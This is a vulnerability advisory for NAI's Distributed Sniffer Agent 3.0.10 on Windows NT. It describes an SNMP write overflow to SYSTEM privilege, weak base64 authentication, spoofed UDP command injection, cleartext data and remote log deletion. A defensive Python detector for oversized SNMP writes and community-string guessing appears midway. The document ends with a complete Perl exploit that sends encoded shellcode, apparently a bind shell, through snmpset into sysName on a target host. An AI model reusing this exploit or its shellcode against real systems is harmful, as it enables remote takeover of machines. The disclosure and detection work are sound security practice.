COMMAND

    Distributed Sniffer Agent

SYSTEMS AFFECTED

    NAI's Distributed Sniffer Agent

PROBLEM

    Kevin Start found the following.  This 'advisory' details a number of
    problems with NAI's Sniffer product.  They have fixed the problems in
    current versions on the sly, so we have foregone notifying the vendor.
    They saw fit to post an advisory about Microsoft's Netmon today, so
    'all is fair in love and war'; at least MS had the dignity to announce
    their fixes.

    NAI's Distributed Sniffer Agent can be overflowed remotely to gain
    SYSTEM privilege.  Additional vulnerabilities in the management
    protocol allow an attacker to recover logins and passwords, take
    control of the agent, and delete logs.

    This has been  tested with Agent  version 3.0.10 using  Windows NT
    Workstation 4.0 SP6.

    1. The most severe problem was an overflow during SNMP writes.  NAI
       elected to use a single community string for both public and
       private access, simplifying the process of brute forcing it.  Once
       this string has been guessed, shellcode can be written into any
       accessible object (sysName, for example).  The buffer is 256 bytes
       long, with no character restrictions, as nulls are allowed when
       using hex mode as the SNMP encoding.  This attack can be launched
       completely blind with one spoofed UDP packet.  SYSTEM privilege can
       be gained using this method.

    2. Authentication was handled using base64 encoded logins and
       passwords.  Dsniff by Dugsong already includes a module for
       capturing logins and passwords from the agent.  Base64 encoding
       was also used to obfuscate changes to the agent's user database.

    3. All remote access  to the agent is  handled using UDP.   Once a
       user has  authenticated to  the agent,  an attacker  can inject
       his own  spoofed commands.   Full control  of the  agent can be
       gained in this manner.   If the packet generation facility  was
       enabled, a packet flood could be initiated.

    4. All data transferred from  the agent is in cleartext,  allowing
       an attacker to recover data  being sniffed on a remote  network
       segment.

    5. Flooding the agent with  false login requests can cause  system
       instability.  A kernel fault was caused during testing.

    6. Logs can  be deleted remotely,  allowing an attacker  to delete
       his own brute forcing attempts once he is successful.
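    The overflow in item 1, and the community string guessing that has to
    precede it, both travel as plain SNMPv1 over UDP, so a network sensor
    can flag them.  The Python below is an added example written for this
    page; it is not part of the advisory or of NAI's software.  It is a
    minimal BER decoder for SNMPv1 messages that flags a SetRequest
    writing an OCTET STRING longer than 255 bytes (or containing
    non-printable bytes, which the hex-mode encoding permits) to an object
    such as sysName, plus a counter that flags a source presenting many
    distinct community strings.  The sample packets and the (source,
    community) events are constructed inline; the helper names, the
    255-byte limit and the guessing threshold are assumptions of this
    example, not references to any real tool's API.

```python
"""Detect, on the wire, the two SNMP behaviours the advisory describes:
a SetRequest writing an oversized or binary OCTET STRING into a MIB object
(the overflow vector) and one source cycling through many community strings
(brute forcing a single shared community)."""
from collections import defaultdict

SYSNAME_OID = "1.3.6.1.2.1.1.5.0"
SET_REQUEST = 0xA3  # SNMPv1 SetRequest-PDU: context class, constructed, tag 3


def _read_tlv(buf, pos):
    """Read one BER tag-length-value; handles short and long-form lengths."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _children(buf):
    """Iterate over the TLVs packed back to back inside a constructed value."""
    pos = 0
    while pos < len(buf):
        tag, val, pos = _read_tlv(buf, pos)
        yield tag, val


def _decode_oid(raw):
    arcs = [raw[0] // 40, raw[0] % 40]
    n = 0
    for b in raw[1:]:
        n = (n << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(n)
            n = 0
    return ".".join(map(str, arcs))


def inspect_snmp(packet, max_string=255):
    """Parse an SNMPv1 message; return version, community, PDU tag and findings."""
    tag, body, _ = _read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    fields = list(_children(body))
    version = int.from_bytes(fields[0][1], "big")
    community = fields[1][1].decode("latin-1")
    pdu_tag, pdu = fields[2]
    findings = []
    if pdu_tag == SET_REQUEST:
        varbinds = list(_children(pdu))[3][1]   # skip request-id, error-status, error-index
        for _, vb in _children(varbinds):
            (_, oid_raw), (vtag, value) = list(_children(vb))[:2]
            oid = _decode_oid(oid_raw)
            if vtag == 0x04 and len(value) > max_string:
                findings.append(f"oversized OCTET STRING ({len(value)} bytes) written to {oid}")
            if vtag == 0x04 and any(b < 0x20 or b > 0x7E for b in value):
                findings.append(f"non-printable bytes written to {oid}")
    return {"version": version, "community": community, "pdu": pdu_tag, "findings": findings}


def detect_community_guessing(events, threshold=5):
    """events: iterable of (source_ip, community). Flag sources that presented
    more than `threshold` distinct community strings (assumed threshold)."""
    seen = defaultdict(set)
    for src, community in events:
        seen[src].add(community)
    return {src: len(c) for src, c in seen.items() if len(c) > threshold}


# --- encoder used only to construct sample packets for this example ---
def _tlv(tag, value):
    n = len(value)
    if n < 128:
        length = bytes([n])
    else:
        size = (n.bit_length() + 7) // 8
        length = bytes([0x80 | size]) + n.to_bytes(size, "big")
    return bytes([tag]) + length + value


def _encode_oid(oid):
    arcs = [int(a) for a in oid.split(".")]
    out = [arcs[0] * 40 + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.insert(0, 0x80 | (a & 0x7F))
            a >>= 7
        out.extend(chunk)
    return bytes(out)


def build_set_request(community, oid, value, request_id=1):
    varbind = _tlv(0x30, _tlv(0x06, _encode_oid(oid)) + _tlv(0x04, value))
    pdu = (_tlv(0x02, bytes([request_id])) + _tlv(0x02, b"\x00") + _tlv(0x02, b"\x00")
           + _tlv(0x30, varbind))
    return _tlv(0x30, _tlv(0x02, b"\x00") + _tlv(0x04, community.encode()) + _tlv(SET_REQUEST, pdu))


# Constructed samples: a normal hostname write and a 300-byte filler write.
BENIGN = build_set_request("public", SYSNAME_OID, b"agent01")
OVERSIZED = build_set_request("public", SYSNAME_OID, b"A" * 300)
# Constructed (source, community) observations: one host trying 12 strings.
EVENTS = [("10.0.0.5", "public"), ("10.0.0.5", "private")] + \
         [("10.0.0.9", f"guess{i}") for i in range(12)]

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, inspect_snmp(pkt))
    print(detect_community_guessing(EVENTS))
```

    Feeding captured UDP/161 payloads to inspect_snmp() and the
    (source, community) pairs it yields to detect_community_guessing()
    gives a sensor both signals the advisory describes; the 255-byte
    limit corresponds to the agent's 256-byte buffer, and the
    non-printable check catches the null-containing hex-mode writes.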

    Exploit:

    #!/usr/bin/perl
    
    # exploit for NAI Sniffer Agent 3.0.10
    # Silently patched in later versions, although customers
    # were not notified.  No workaround was ever released.
    
    $xoredport="88 88 ";  # (4369) port XORed with 0x99
    
    $egg ="
    eb 07 90 aa 1c 9c 77 90 90 90 33 c0 50 f7 d0 50 59 f2
    af 59 b1 c6 8b c7 48 80 30 99 e2 fa 60 8d 85 70 fe
    ff ff 50 68 01 01 00 00 bb 77 be 6b 77 ff d3 61
    90 90 90 90 33 f6 96 bb 99 3c 60 47 c1 eb 08 56
    ff 13 8b d0 fc 33 c9 b1 0b 49 32 c0 ac 84 c0 75
    f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 32 c0
    ac 84 c0 75 f9 b3 3c 56 ff 13 8b d0 fc 33 c9 b1
    06 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13
    ab 59 5a e2 ec 83 c6 05 33 c0 50 40 50 40 50 ff 57 e8 93 6a 10 56 53
    ff 57 ec 6a 02 53 ff 57 f0 33 c0 57 50 b0 0c ab
    58 ab 40 ab 5f 48 50 57 56 ad 56 ff 57 c0 48 50
    57 ad 56 ad 56 ff 57 c0 48 b0 44 89 07 57 ff 57
    c4 33 c0 8b 46 f4 89 47 3c 89 47 40 8b 06 89 47
    38 33 c0 66 b8 01 01 89 47 2c 57 57 33 c0 50 50
    50 40 50 48 50 50 ad 56 33 c0 50 ff 57 c8 ff 76
    f0 ff 57 cc ff 76 fc ff 57 cc 48 50 50 53 ff 57
    f4 8b d8 33 c0 b4 04 50 c1 e8 04 50 ff 57 d4 8b
    f0 33 c0 8b c8 b5 04 50 50 57 51 50 ff 77 a8 ff
    57 d0 83 3f 01 7c 22 33 c0 50 57 ff 37 56 ff 77
    a8 ff 57 dc 0b c0 74 2f 33 c0 50 ff 37 56 53 ff
    57 f8 6a 50 ff 57 e0 eb c8 33 c0 50 b4 04 50 56
    53 ff 57 fc 57 33 c9 51 50 56 ff 77 ac ff 57 d8
    6a 50 ff 57 e0 eb aa 50 ff 57 e4 90 d2 dc cb d7
    dc d5 aa ab 99 da eb fc f8 ed fc c9 f0 e9 fc 99
    de fc ed ca ed f8 eb ed ec e9 d0 f7 ff f6 d8 99
    da eb fc f8 ed fc c9 eb f6 fa fc ea ea d8 99 da
    f5 f6 ea fc d1 f8 f7 fd f5 fc 99 c9 fc fc f2 d7
    f8 f4 fc fd c9 f0 e9 fc 99 de f5 f6 fb f8 f5 d8
    f5 f5 f6 fa 99 ce eb f0 ed fc df f0 f5 fc 99 cb
    fc f8 fd df f0 f5 fc 99 ca f5 fc fc e9 99 dc e1
    f0 ed c9 eb f6 fa fc ea ea 99 ce ca d6 da d2 aa
    ab 99 ea f6 fa f2 fc ed 99 fb f0 f7 fd 99 f5 f0
    ea ed fc f7 99 f8 fa fa fc e9 ed 99 ea fc f7 fd
    99 eb fc fa ef 99 9b 99  $xoredport 99 99 99 99
    99 99 99 99 99 99 99 99 fa f4 fd b7 fc e1 fc 99
    ff ff ff ff ";
    
    $offset = "00 c7 12 00 ";
    
    $snmpset = "/usr/bin/snmpset";
    $community = "public";
    $objid = "system.sysName.0";
    $offcount = 80;
    $nopcount = 200;
    
    @execstring = ("\" ", $offset x $offcount, "90 "x $nopcount, $egg,"
    \"");
    
    $host="HOST TO 0WN";
    
    exec ("$snmpset $host $community $objid x @sploitstring");

SOLUTION

    Fixed in current versions.